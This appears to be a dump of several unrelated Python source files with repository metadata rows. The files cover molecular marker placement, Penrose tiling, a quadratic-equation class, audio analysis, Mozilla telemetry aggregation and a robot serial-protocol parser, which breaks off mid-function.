if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((610.451, 376.805, 729.065), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((503.731, 456.783, 568.314), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((518.031, 436.448, 558.426), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((551.523, 395.837, 535.75), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((585.909, 355.901, 512.913), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((519.338, 311.221, 519.184), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((681.989, 335.544, 476.443), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((545.897, 450.246, 616.395), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((537.901, 457.27, 589.219), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((533.611, 465.386, 561.546), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((534.682, 455.549, 533.733), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((542.808, 446.981, 507.012), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((552.23, 438.446, 480.705), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((520.832, 413.119, 549.794), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((584.557, 460.814, 407.935), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"batxes@gmail.com"
] | batxes@gmail.com |
b4720b1d522b94633c5d679037ba07153eac71b2 | c5f998a4f17a5230094fdb705e374b96a5981b42 | /task1v2.py | 901646e68cf4cefc028682a6a778cd38cc0425b0 | [] | no_license | hodasartem/Python-44 | e5a559aec70e1bae6cc3369e14f7af267bd4c214 | 66a44fa5b6e4da4de48da5aa4fe49254a3f3bc13 | refs/heads/main | 2023-08-25T13:04:52.575373 | 2021-09-26T08:54:08 | 2021-09-26T08:54:08 | 410,501,393 | 0 | 0 | null | 2021-09-26T10:16:37 | 2021-09-26T08:59:52 | Python | UTF-8 | Python | false | false | 186 | py | '''
milk == 3
butter == 5
bread == 7
'''
product = input('Insert the product:\n')
shop_items = {
'milk': 3,
'butter': 5,
'bread': 7
}
print(shop_items.get(product.lower(), -1)) | [
"hodasartem777@gmail.com"
] | hodasartem777@gmail.com |
716527aca7bc545f06d76e03edefcf6a532451fe | 61e9f2ffcd2a86319e6be84f971db31b234aa9cb | /src/Continuous_Penrose/test.py | 27cc1382da010f3e598c829abcd86c5e60442fd4 | [
"MIT"
] | permissive | kms70847/Animation | a4d520199907b5d8b080af5984e410a36e942f62 | 784c44edc7b8b1d60d439cc906bbe474ea4d3758 | refs/heads/master | 2021-07-12T23:31:24.805736 | 2021-04-07T20:12:38 | 2021-04-07T20:12:38 | 44,679,946 | 17 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,808 | py | import math
from geometry import Point, midpoint
from PIL import Image, ImageDraw
phi = (1 + math.sqrt(5)) / 2
def exp(radius, angle):
return Point(math.cos(angle)*radius, math.sin(angle)*radius)
# def kite(a,b,c, depth):
# if depth == 1:
# draw.polygon(a.tuple()+b.tuple()+c.tuple(), outline="black", fill="white")
# else:
# p = midpoint(a,b, (phi-1)/phi)
# q = midpoint(a,c, 1/phi)
# dart(p,q,a, depth-1)
# kite(b,p,q, depth-1)
# kite(b,c,q, depth-1)
# def dart(d,e,f, depth):
# if depth == 1:
# draw.polygon(d.tuple()+e.tuple()+f.tuple(), outline="black", fill="gray")
# else:
# p = midpoint(e,f, (phi-1)/phi)
# dart(p,d,e, depth-1)
# kite(f,p,d, depth-1)
kitefill = "white"
dartfill = "gray"
outline = None
def kite(a,b,c, depth, parent="k"):
if depth <= 1:
if parent == "k" or depth == 1:
draw.polygon(a.tuple()+b.tuple()+c.tuple(), outline=outline, fill=kitefill)
else:
ab = midpoint(a,b, depth)
ac = midpoint(a,c,depth)
draw.polygon(a.tuple()+ab.tuple()+ac.tuple(), outline=outline, fill=kitefill)
draw.polygon(b.tuple() + c.tuple() + ac.tuple() + ab.tuple(), outline=outline, fill=dartfill)
else:
p = midpoint(a,b, (phi-1)/phi)
q = midpoint(a,c, 1/phi)
dart(p,q,a, depth-1, "k")
kite(b,p,q, depth-1, "k")
kite(b,c,q, depth-1, "k")
def dart(d,e,f, depth, parent="d"):
if depth <= 1:
if parent == "d" or depth == 1:
draw.polygon(d.tuple()+e.tuple()+f.tuple(), outline=outline, fill=dartfill)
else:
fd = midpoint(f,d, depth)
fe = midpoint(f,e, depth)
draw.polygon(f.tuple() + fd.tuple() + fe.tuple(), outline=outline, fill=dartfill)
draw.polygon(d.tuple() + e.tuple() + fe.tuple() + fd.tuple(), outline=outline, fill=kitefill)
else:
p = midpoint(e,f, (phi-1)/phi)
dart(p,d,e, depth-1, "d")
kite(f,p,d, depth-1, "d")
def bounce(frames):
return frames + [frames[-1]] * 12 + list(frames[::-1]) + [frames[0]]*12
draw = None
def render(frac):
global draw
radius = 1000
center = Point(radius, radius)
img = Image.new("RGB", (radius*2, radius*2), "white")
draw = ImageDraw.Draw(img)
spokes = [center + exp(radius, math.radians(theta)) for theta in range(0, 360, 36)]
for i in range(10):
b = spokes[i]
c = spokes[(i+1)%len(spokes)]
if i %2 == 1: b,c = c,b
kite(center, b,c,frac)
img = img.resize((radius/2, radius/2), Image.ANTIALIAS)
return img
import animation
frames = []
for i in range(64):
print i,
frames.append(render(1 + (i / 8.)))
animation.make_gif(bounce(frames), delay=8) | [
"kevin.m.smiley@gmail.com"
] | kevin.m.smiley@gmail.com |
d5808f86d9ebf25d4fa6321b5b14b50847bc8414 | 90d3af65fc9900f2abb7eaa7631646856e115da3 | /COMP9021/lecture/quadratic_equation_v5.py | 32e18a6aaeae380a362bf3d9d2dbaab0a24fd8d2 | [] | no_license | Tim-hyx/UNSW-Courses | d414b79b6c5b428be12456ba85e1757ac871535b | b7031ea9ac833b5a396e7938ef73cc335a2e37b7 | refs/heads/main | 2023-07-10T19:48:34.731340 | 2021-08-10T02:39:14 | 2021-08-10T02:39:14 | 300,894,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,092 | py | # Written by Eric Martin for COMP9021
'''
Represents a quadratic equation as a class with a, b, c, root_1 and
root_2 as data. By default, a is set to 1 and b and c are set to 0.
The parameters can be changed with the update() function.
Whether the parameters are changed when the equation is created or by a
call to the update() function, a, b and c have to be explictly named.
The roots are automatically computed when the equation is created or
when some parameter is updated.
'''
from math import sqrt
class QuadraticEquationError(Exception):
pass
class QuadraticEquation:
'''
>>> eq = QuadraticEquation.__new__(QuadraticEquation)
>>> QuadraticEquation.__init__(eq, a=0, b=1)
Traceback (most recent call last):
...
QuadraticEquationError: a cannot be equal to 0.
>>> eq1 = QuadraticEquation.__new__(QuadraticEquation)
>>> QuadraticEquation.__init__(eq1)
>>> eq1.a
1
>>> eq1.b
0
>>> eq1.c
0
>>> eq1.root_1
0.0
>>> eq1.root_2
>>> eq2 = QuadraticEquation.__new__(QuadraticEquation)
>>> QuadraticEquation.__init__(eq2, b=4)
>>> eq2.a
1
>>> eq2.b
4
>>> eq2.c
0
>>> eq2.root_1
-4.0
>>> eq2.root_2
0.0
>>> eq3 = QuadraticEquation.__new__(QuadraticEquation)
>>> QuadraticEquation.__init__(eq3, a=1, b=3, c=2)
>>> eq3.a
1
>>> eq3.b
3
>>> eq3.c
2
>>> eq3.root_1
-2.0
>>> eq3.root_2
-1.0
>>> QuadraticEquation.update(eq3, a=0)
Traceback (most recent call last):
...
QuadraticEquationError: a cannot be equal to 0.
>>> QuadraticEquation.update(eq3, b=-1)
>>> eq3.root_1
>>> eq3.root_2
>>> QuadraticEquation.update(eq3, c=0.3, a=0.5)
>>> eq3.root_1
0.3675444679663241
>>> eq3.root_2
1.632455532033676
>>>
>>> # USUAL ALTERNATIVE SYNTAX
>>>
>>> QuadraticEquation(a=0, b=1)
Traceback (most recent call last):
...
QuadraticEquationError: a cannot be equal to 0.
>>> eq1 = QuadraticEquation()
>>> eq1.a
1
>>> eq1.b
0
>>> eq1.c
0
>>> eq1.root_1
0.0
>>> eq1.root_2
>>> eq2 = QuadraticEquation(b=4)
>>> eq2.a
1
>>> eq2.b
4
>>> eq2.c
0
>>> eq2.root_1
-4.0
>>> eq2.root_2
0.0
>>> eq3 = QuadraticEquation(a=1, b=3, c=2)
>>> eq3.a
1
>>> eq3.b
3
>>> eq3.c
2
>>> eq3.root_1
-2.0
>>> eq3.root_2
-1.0
>>> eq3.update(a=0)
Traceback (most recent call last):
...
QuadraticEquationError: a cannot be equal to 0.
>>> eq3.update(b=-1)
>>> eq3.root_1
>>> eq3.root_2
>>> eq3.update(c=0.3, a=0.5)
>>> eq3.root_1
0.3675444679663241
>>> eq3.root_2
1.632455532033676
'''
def __init__(self, *, a=1, b=0, c=0):
if a == 0:
raise QuadraticEquationError('a cannot be equal to 0.')
self.a = a
self.b = b
self.c = c
self.compute_roots()
def __repr__(self):
'''
>>> QuadraticEquation()
QuadraticEquation(a=1, b=0, c=0)
>>> QuadraticEquation(c=-5, a=2)
QuadraticEquation(a=2, b=0, c=-5)
>>> QuadraticEquation(b=1, a=-1, c=-1)
QuadraticEquation(a=-1, b=1, c=-1)
'''
return f'QuadraticEquation(a={self.a}, b={self.b}, c={self.c})'
def __str__(self):
'''
>>> print(QuadraticEquation())
x^2 = 0
>>> print(QuadraticEquation(c=-5, a=2))
2x^2 - 5 = 0
>>> print(QuadraticEquation(b=1, a=-1, c=-1))
-x^2 + x - 1 = 0
'''
if self.a == 1:
displayed_equation = 'x^2'
elif self.a == -1:
displayed_equation = '-x^2'
else:
displayed_equation = f'{self.a}x^2'
if self.b == 1:
displayed_equation += ' + x'
elif self.b == -1:
displayed_equation -= ' - x'
elif self.b > 0:
displayed_equation += f' + {self.b}x'
elif self.b < 0:
displayed_equation += f'- {-self.b}x'
if self.c > 0:
displayed_equation += f' + {self.c}'
elif self.c < 0:
displayed_equation += f' - {-self.c}'
return f'{displayed_equation} = 0'
def compute_roots(self):
delta = self.b ** 2 - 4 * self.a * self.c
if delta < 0:
self.root_1 = self.root_2 = None
elif delta == 0:
self.root_1 = -self.b / (2 * self.a)
self.root_2 = None
else:
sqrt_delta = sqrt(delta)
self.root_1 = (-self.b - sqrt_delta) / (2 * self.a)
self.root_2 = (-self.b + sqrt_delta) / (2 * self.a)
def update(self, *, a=None, b=None, c=None):
if a == 0:
raise QuadraticEquationError('a cannot be equal to 0.')
if a is not None:
self.a = a
if b is not None:
self.b = b
if c is not None:
self.c = c
self.compute_roots()
if __name__ == '__main__':
import doctest
doctest.testmod()
| [
"noreply@github.com"
] | Tim-hyx.noreply@github.com |
fa129e88da4e08d94d2ae7cbc77816d05dda9af7 | 4be47041113d9187034ac4ba61a60208ebf9622b | /Audio.py | 79d6e7db70a92f1deb5883bb703aaa9375d31b79 | [] | no_license | BenLehmann12/Audio-Processing- | 92ab019b417e1bafe58d1d35ceddb505e72175c3 | 95c6f6c671a1d6f2a390598a7b3777fa17764285 | refs/heads/master | 2022-11-26T22:45:06.007380 | 2020-08-02T20:14:59 | 2020-08-02T20:14:59 | 268,144,982 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,888 | py | import librosa
import librosa.display
import IPython.display as ipd
import os
import matplotlib.pyplot as plt
import numpy as np
#os.path.exists('Users/Lehman/PycharmProjects/space_oddity.wav') #Made sure the file is set
#print(os.listdir())
path = 'island_music_x.wav'
x, sr = librosa.load(path)
print(x.shape,sr) #x.shape = (276480,) sr = 22050
plt.figure(figsize=(14,5))
librosa.display.waveplot(x, sr=sr)
plt.show()
X = librosa.stft(x)
Xdb = librosa.amplitude_to_db(abs(X))
plt.figure(figsize=(14,5))
librosa.display.specshow(Xdb,sr=sr, x_axis='time',y_axis='log')
plt.colorbar()
plt.show()
#Perceptual Weighting:
freq = librosa.core.fft_frequencies(sr=sr)
mag = librosa.perceptual_weighting(abs(X)**2, freq)
librosa.display.specshow(mag, sr=sr, x_axis='time', y_axis='log')
plt.colorbar()
plt.show()
r = librosa.autocorrelate(x, max_size=6000)
sample = r[:300]
plt.figure(figsize=(14,5))
plt.plot(sample)
plt.show()
#Chroma Features
sound_len = 400
chrom = librosa.feature.chroma_stft(x, sr=sr, hop_length=sound_len)
plt.figure(figsize=(14,5))
librosa.display.specshow(chrom, x_axis='time',y_axis='chroma', hop_length=sound_len)
plt.colorbar()
plt.show()
#Mel-power
S = librosa.feature.melspectrogram(x,sr=sr,n_fft=120)
log = librosa.power_to_db(S, ref=np.max)
plt.figure(figsize=(14,5))
librosa.display.specshow(log,sr=sr,x_axis='time',y_axis='mel')
plt.colorbar()
plt.show()
def Vocal():
X, fr = librosa.load('space_oddity.wav') #Worked With David Bowie's Space Oddity
librosa.display.waveplot(X, sr=fr)
plt.show()
mfc = librosa.feature.mfcc(X,sr=fr)
librosa.display.specshow(mfc,sr=fr, x_axis='time')
plt.show()
n1 = 600
n2 = 700
plt.figure(figsize=(15,4))
plt.plot(X[n1:n2])
plt.show()
zero_cross = sum(librosa.zero_crossings(X[n1:n2], pad=False)) # Zero Crossing is 6
| [
"noreply@github.com"
] | BenLehmann12.noreply@github.com |
bf257165b2f74181970ef391c605e8952b3eaa10 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03324/s989817125.py | f8ce37adb41afe47dfcaf209885260199bbdb52d | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 447 | py | #!/usr/bin/env python3
d, n = map(int, input().split())
if d == 0:
if n == 100:
print(101)
else:
print(n)
elif d == 1:
l = []
if n == 100:
print(10100)
else:
for i in range(1, 100):
l.append(100 * i)
print(l[n-1])
else:
if n == 100:
print(1010000)
else:
l = []
for i in range(1, 101):
l.append(100 * 100 * i)
print(l[n-1]) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
c65c3fafb3849bf153c49e517efd3dc0fdd061aa | 569a7c330511c58276c3bb020de20cd7779d2e37 | /mozaggregator/db.py | 94d4ab8f9e4e61628919c6765470f50bbc05f5c9 | [] | no_license | vitillo/python_mozaggregator | 3b6cbe57baf49b83646624ddcc5042f84d857a07 | 938880ac951edabe444ef7534cd88d6eeffa5c03 | refs/heads/master | 2021-01-10T01:29:22.001471 | 2015-09-25T11:16:29 | 2015-09-25T11:16:29 | 36,069,380 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,462 | py | #!/usr/bin/env python
# encoding: utf-8
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import psycopg2
import pandas as pd
import ujson as json
import boto.rds2
import os
import string
import sql
import config
from moztelemetry.spark import Histogram
from boto.s3.connection import S3Connection
from cStringIO import StringIO
from mozaggregator.aggregator import simple_measures_labels, count_histogram_labels
# Use latest revision, we don't really care about histograms that have
# been removed. This only works though if histogram definitions are
# immutable, which has been the case so far.
histogram_revision_map = {"nightly": "https://hg.mozilla.org/mozilla-central/rev/tip",
"aurora": "https://hg.mozilla.org/releases/mozilla-aurora/rev/tip",
"beta": "https://hg.mozilla.org/releases/mozilla-beta/rev/tip",
"release": "https://hg.mozilla.org/releases/mozilla-release/rev/tip"}
_metric_printable = set(string.ascii_uppercase + string.ascii_lowercase + string.digits + "_-[]")
def get_db_connection_string():
if os.getenv("DB_TEST_URL"):
return os.getenv("DB_TEST_URL")
elif config.USE_PRODUCTION_DB:
s3 = S3Connection()
secret = json.loads(s3.get_bucket(config.BUCKET).get_key(config.SECRET).get_contents_as_string())["password"]
rds = boto.rds2.connect_to_region(config.REGION)
db = rds.describe_db_instances(config.RDS)["DescribeDBInstancesResponse"]["DescribeDBInstancesResult"]["DBInstances"][0]
return "dbname={} user={} password={} host={}".format(db["DBName"], db["MasterUsername"], secret, db["Endpoint"]["Address"])
else:
return "dbname={} user={} password={} host={}".format(config.DBNAME, config.DBUSER, config.DBPASS, config.DBHOST)
def _create_connection(autocommit=True, host_override=None, dbname_override=None):
conn = psycopg2.connect(get_db_connection_string())
if autocommit:
conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
return conn
def submit_aggregates(aggregates, dry_run=False):
_preparedb()
build_id_count = aggregates[0].groupBy(lambda x: x[0][:4]).\
map(lambda x: _upsert_build_id_aggregates(x, dry_run=dry_run)).\
count()
submission_date_count = aggregates[1].groupBy(lambda x: x[0][:3]).\
map(lambda x: _upsert_submission_date_aggregates(x, dry_run=dry_run)).\
count()
_vacuumdb()
return build_id_count, submission_date_count
def _preparedb():
conn = _create_connection()
cursor = conn.cursor()
cursor.execute(sql.query)
def _get_complete_histogram(channel, metric, values):
revision = histogram_revision_map.get(channel, "nightly") # Use nightly revision if the channel is unknown
if metric.startswith("SIMPLE_MEASURES"):
histogram = pd.Series({int(k): v for k, v in values.iteritems()}, index=simple_measures_labels).fillna(0).values
elif metric.startswith("[[COUNT]]_"): # Count histogram
histogram = pd.Series({int(k): v for k, v in values.iteritems()}, index=count_histogram_labels).fillna(0).values
else:
histogram = Histogram(metric, {"values": values}, revision=revision).get_value(autocast=False).values
return map(long, list(histogram))
def _upsert_aggregate(stage_table, aggregate):
key, metrics = aggregate
submission_date, channel, version, application, architecture, os, os_version, e10s = key[:3] + key[-5:]
dimensions = {"application": application,
"architecture": architecture,
"os": os,
"osVersion": os_version,
"e10sEnabled": e10s}
for metric, payload in metrics.iteritems():
metric, label, child = metric
if not set(metric).issubset(_metric_printable):
continue # Ignore metrics with non printable characters...
try:
histogram = _get_complete_histogram(channel, metric, payload["histogram"]) + [payload["sum"], payload["count"]]
except KeyError:
continue
dimensions["metric"] = metric
dimensions["label"] = label
dimensions["child"] = child
json_dimensions = json.dumps(dimensions)
# json.dumps takes care of properly escaping the text but a SQL command
# will first be interpreted as a string literal before being executed.
# This doubles the number of backslashes we need.
json_dimensions = json_dimensions.replace("\\", "\\\\")
stage_table.write("{}\t{}\n".format(json_dimensions, "{" + ",".join([str(long(x)) for x in histogram]) + "}"))
def _upsert_build_id_aggregates(aggregates, dry_run=False):
conn = _create_connection(autocommit=False)
cursor = conn.cursor()
submission_date, channel, version, build_id = aggregates[0]
# Aggregates with different submisssion_dates write to the same tables, we need a lock
cursor.execute("select lock_transaction(%s, %s, %s, %s)", ("build_id", channel, version, build_id))
cursor.execute("select was_processed(%s, %s, %s, %s, %s)", ("build_id", channel, version, build_id, submission_date))
if cursor.fetchone()[0]:
# This aggregate has already been processed
conn.rollback()
return
stage_table = StringIO()
cursor.execute("select create_temporary_table(%s, %s, %s, %s)", ("build_id", channel, version, build_id))
stage_table_name = cursor.fetchone()[0]
for aggregate in aggregates[1]:
_upsert_aggregate(stage_table, aggregate)
stage_table.seek(0)
cursor.copy_from(stage_table, stage_table_name, columns=("dimensions", "histogram"))
cursor.execute("select merge_table(%s, %s, %s, %s, %s)", ('build_id', channel, version, build_id, stage_table_name))
if dry_run:
conn.rollback()
else:
conn.commit()
cursor.close()
conn.close()
def _upsert_submission_date_aggregates(aggregates, dry_run=False):
conn = _create_connection(autocommit=False)
cursor = conn.cursor()
submission_date, channel, version = aggregates[0]
cursor.execute("select was_processed(%s, %s, %s, %s, %s)", ("submission_date", channel, version, submission_date, submission_date))
if cursor.fetchone()[0]:
# This aggregate has already been processed
conn.rollback()
return
stage_table = StringIO()
cursor.execute("select create_temporary_table(%s, %s, %s, %s)", ("submission_date", channel, version, submission_date))
stage_table_name = cursor.fetchone()[0]
for aggregate in aggregates[1]:
_upsert_aggregate(stage_table, aggregate)
stage_table.seek(0)
cursor.copy_from(stage_table, stage_table_name, columns=("dimensions", "histogram"))
cursor.execute("select merge_table(%s, %s, %s, %s, %s)", ("submission_date", channel, version, submission_date, stage_table_name))
if dry_run:
conn.rollback()
else:
conn.commit()
cursor.close()
conn.close()
def _vacuumdb():
conn = _create_connection()
conn.set_isolation_level(0)
cursor = conn.cursor()
cursor.execute("vacuum")
cursor.close()
conn.close()
| [
"ra.vitillo@gmail.com"
] | ra.vitillo@gmail.com |
e499c5885f41fbad43983182c64a49fb3142f5d2 | 13ec0c28352b255596e2a801ecb9d529eebc114b | /SerialTool/Robot.py | 57336b279cc4c3ae0d00ec74b2fce85cb07a81d0 | [] | no_license | yergen/SerialTool | cdd38ce8bc92020f3736f24b2d17fafac9d1fc07 | b068051ea939308030cf2dc37973127d7906470a | refs/heads/master | 2020-08-12T00:20:53.113814 | 2019-10-12T14:02:11 | 2019-10-12T14:02:11 | 214,568,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,395 | py | import struct
from datetime import datetime
class QxRobot(object):
def __init__(self):
#super(QxRobot, self).__init__(parent)
self.initVariable()
def initVariable(self):
self.jointVersion = 0
self.multiple = 0
self.errorLog = []
self.lastID = 255
self.joint0 = []
self.joint1 = []
self.joint2 = []
self.joint3 = []
self.joint4 = []
self.joint5 = []
self.joint6 = []
self.allJoint = {"基座":self.joint0, "肩部":self.joint1, "肘部":self.joint2,
"手腕1":self.joint3, "手腕2":self.joint4, "手腕3":self.joint5, "工具板":self.joint6}
#数据解析
def dataProcess(self, receiveBuffer):
if len(receiveBuffer) >3:
ID = receiveBuffer[1]#获取关节ID
if self.checkCRC(receiveBuffer):#校验CRC
if ID <= self.lastID and self.lastID != 255 and self.multiple:
self.error(38, ID-self.lastID)
else:
if ID >=0+ self.jointVersion and ID <= 6+self.jointVersion:
if ID == 6+self.jointVersion:
self.lastID = 255
else:
self.lastID = ID
self.jointModeProcess(receiveBuffer[1:-2])
else:
self.error(30, ID)
else:
self.error(44, ID)
#数据打包
#sendBuffer:为一个列表,索引值的数据是相应关节和工具板的数据。
def dataPack(self, sendBuffer):
data = b''
for i in range(7):
data += sendBuffer[i]
dataLength = struct.pack('B', len(data)+1)
no_CRCData = dataLength + data
CRCData = self.generateCRC(no_CRCData)
return CRCData
#将接收到的关节数据根据不同的工作模式进行解包
def jointModeProcess(self, buffer):
joint_ID = buffer[0]
workMode = buffer[1]
tempForm = {}
if joint_ID != 0x06+self.jointVersion:
if workMode == 0x00:
self.error(buffer[2], buffer[3])
ID, Mode, Code, Msg = struct.unpack('>4B', buffer)#>:大端 B:无符号char
tempForm = {"jointID": ID,"workMode":Mode, "errorCode":Code, "errorMsg":Msg}
elif workMode == 0x8C:
ID, Mode, End = struct.unpack('>2BH', buffer)
tempForm = {"jointID": ID,"workMode":Mode, "endAddress":End}
elif workMode == 0x94:
ID, Mode, Cycle, L_Pos = struct.unpack('>2BlH', buffer)
tempForm = {"jointID": ID,"workMode":Mode, "Cycle":Cycle, "lastPos":L_Pos}
elif workMode == 0xFD:
ID, Mode, Pos, Speed, Cur, GearMax, Gear, Sensor = struct.unpack('>2BL3shlhB', buffer)
SpeedValue = self.speedProcess(Speed)
tempForm = {"jointID":ID, "workMode":Mode, "jointPos":Pos,"jointSpeed":SpeedValue,
"jointCur":Cur,"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xFB:
ID, Mode, Pos, Cur, GearMax, Gear, Sensor = struct.unpack('>2BLhlhB', buffer)
tempForm = {"jointID":ID, "workMode":Mode, "jointPos":Pos, "jointCur":Cur,
"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xF3:
ID, Mode, Pos, Speed, Cur, GearMax, Gear, Sensor = struct.unpack('>2BL3shlhB', buffer)
SpeedValue = self.speedProcess(Speed)
tempForm = {"jointID":ID, "workMode":Mode, "jointPos":Pos,"jointSpeed":SpeedValue,
"jointCur":Cur,"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xFF:
ID, Mode, GearMax, Gear, Sensor = struct.unpack('>2BlhB', buffer)
tempForm = {"jointID":ID, "workMode":Mode, "gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xF6:
ID, Mode, GearMax, Gear, Sensor = struct.unpack('>2BlhB', buffer)
tempForm = {"jointID":ID, "workMode":Mode, "gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xFE:
ID, Mode,Speed, Cur, GearMax, Gear, Sensor = struct.unpack('>2B3shlhB', buffer)
SpeedValue = self.speedProcess(Speed)
tempForm = {"jointID":ID, "workMode":Mode, "jointSpeed":SpeedValue, "jointCur":Cur,
"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xED:
ID, Mode,Speed, Cur, GearMax, Gear, Sensor = struct.unpack('>2B3shlhB', buffer)
SpeedValue = self.speedProcess(Speed)
tempForm = {"jointID":ID, "workMode":Mode, "jointSpeed":SpeedValue, "jointCur":Cur,
"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xF0:
ID, Mode,Speed, Cur, GearMax, Gear, Sensor = struct.unpack('>2B3shlhB', buffer)
SpeedValue = self.speedProcess(Speed)
tempForm = {"jointID":ID, "workMode":Mode, "jointSpeed":SpeedValue, "jointCur":Cur,
"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xEE:
ID, Mode,Speed, Cur, GearMax, Gear, Sensor = struct.unpack('>2B3shlhB', buffer)
SpeedValue = self.speedProcess(Speed)
tempForm = {"jointID":ID, "workMode":Mode, "jointSpeed":SpeedValue, "jointCur":Cur,
"gearMax":GearMax, "gear":Gear, "sensor":Sensor}
elif workMode == 0xF7:
if len(buffer) == 0x0E-3:
ID, Mode, AddIndex, FlashData = struct.unpack('>3B8s', buffer)
tempForm = {"jointID":ID, "workMode":Mode, "addIndex":AddIndex, "flashData":FlashData}
elif len(buffer) == 0x0A-3:
ID, Mode, AddIndex, FlashData = struct.unpack('>3B4s', buffer)
tempForm = {"jointID":ID, "workMode":Mode, "addIndex":AddIndex, "flashData":FlashData}
else:
if workMode == 0xFD:#只处理运行模式数据,其他都舍弃。
ID, Mode, Others = struct.unpack('>2B14s', buffer)
tempForm = {"jointID":ID, "workMode":Mode, "others":Others}
#将解析完的数据进行存储
if len(tempForm) != 0:
if tempForm["jointID"] == 0x00 + self.jointVersion:
self.joint0.append(tempForm)
elif tempForm["jointID"] == 0x01 + self.jointVersion:
self.joint1.append(tempForm)
elif tempForm["jointID"] == 0x02 + self.jointVersion:
self.joint2.append(tempForm)
elif tempForm["jointID"] == 0x03 + self.jointVersion:
self.joint3.append(tempForm)
elif tempForm["jointID"] == 0x04 + self.jointVersion:
self.joint4.append(tempForm)
elif tempForm["jointID"] == 0x05 + self.jointVersion:
self.joint5.append(tempForm)
elif tempForm["jointID"] == 0x06 + self.jointVersion:
self.joint6.append(tempForm)
#print(tempForm)
#速度的特殊格式处理
def speedProcess(self, Speed):
if Speed[0] & 0x80:
tempSpeed = b'\xFF' + Speed
else:
tempSpeed = b'\x00' + Speed
speedValue, = struct.unpack('>l', tempSpeed)#speedValue,逗号必须添加。否则返回tuple类型
return speedValue
#在数据最后打包CRC
def generateCRC(self, sendBuffer):
tempBuffer = bytearray(sendBuffer[0]+2)#新建bytearray类型,sendBuffer[0]+2大小的变量
for i in range(len(sendBuffer)):
tempBuffer[i] = sendBuffer[i]
temp = 0x0000
#sendBuffer[0] = sendBuffer[0] + 2 #error: 字节流数组是不可修改的
tempBuffer[0] += 2 #bytearray可以修改
for d in tempBuffer[:-2]:
temp = self.calculateCrc(temp, d)
